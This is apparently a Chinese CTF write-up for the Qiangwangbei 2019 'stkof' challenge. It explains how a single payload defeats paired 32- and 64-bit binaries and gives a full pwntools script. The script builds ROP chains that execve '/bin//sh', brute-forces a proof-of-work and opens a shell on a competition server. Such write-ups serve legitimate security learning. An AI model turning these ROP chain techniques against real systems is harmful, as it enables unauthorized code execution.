强网杯2019
ROPgadget --binary _stkof --ropchain
ROPgadget --binary __stkof --ropchain
加了拟态防御,需要同一个payload来pwn掉两个程序
64位按正常的ROP打,32位加一个 RET NUMBER 来跳转栈顶,跳到64位payload的后面32位payload,从而getshell
攻击脚本:
from pwn import *
from struct import pack
import random, string, subprocess, os, sys
from hashlib import sha256
def ropchain(bit):
if bit == 64:
p = ''
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e0) # @ .data
p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004005f6) # pop rdi ; ret
p += pack('<Q', 0x00000000006a10e0) # @ .data
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x000000000043b9d5) # pop rdx ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000461110) # mov rax, 5; ret;
p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
p += p64(0x3b)
p += pack('<Q', 0x0000000000461645) # syscall ; ret
return p
elif bit == 32:
p = ''
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9064) # @ .data + 4
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x08056040) # xor eax, eax ; ret
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x0806e9f2) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080d9060) # padding without overwrite ebx
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x08056040) # xor eax, eax ; ret
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += p32(11)
p += pack('<I', 0x080495a3) # int 0x80
return p
else:
return None
def remote_attack():
team_token = 'b67f9528c4a5c8cf7b32d064e0486493'
def brute(suffix, expected):
for i in xrange(0, 0xff):
for j in xrange(0, 0xff):
for k in xrange(0, 0xff):
x = chr(i) + chr(j) + chr(k)
h = sha256(suffix + x).hexdigest()
if h == expected:
skr = (suffix + x).encode('hex')
return skr
io = remote('49.4.51.149',25391)
io.recvuntil('hexdigest()=')
sha = io.recv(64)
io.recvuntil("ncode('hex')=")
pre = io.recv(10).decode('hex')
skr = brute(pre,sha)
print 'skr::',skr
io.sendline(skr);sleep(0.5)
io.sendline(team_token)
print 'Send team_token successfully!'
buf = 0x80daedb
read_puts_leave_ret = 0x8048907
leave_ret = 0x804892E
ret_10c = 0x8099bbe#0x0807da0a#: ret 0x126
ret = 0x806e9cc
buf = 0x80daedb
read_puts_leave_ret = 0x8048907
leave_ret = 0x804892E
rop64 = ropchain(64)
pay = 'a'*0x110\
+p32(ret_10c)+p32(ret)\
+rop64\
+'\x00'*(0x10c-len(rop64))\
+ropchain(32)
io.send(pay);sleep(0.1)
io.interactive()
remote_attack()
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。
文章标题:强网杯2019
本文作者:枫云李
发布时间:2020-01-16, 02:06:12
最后更新:2020-04-11, 01:15:22
原始链接:https://primelyw.github.io/2020/01/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2019/版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。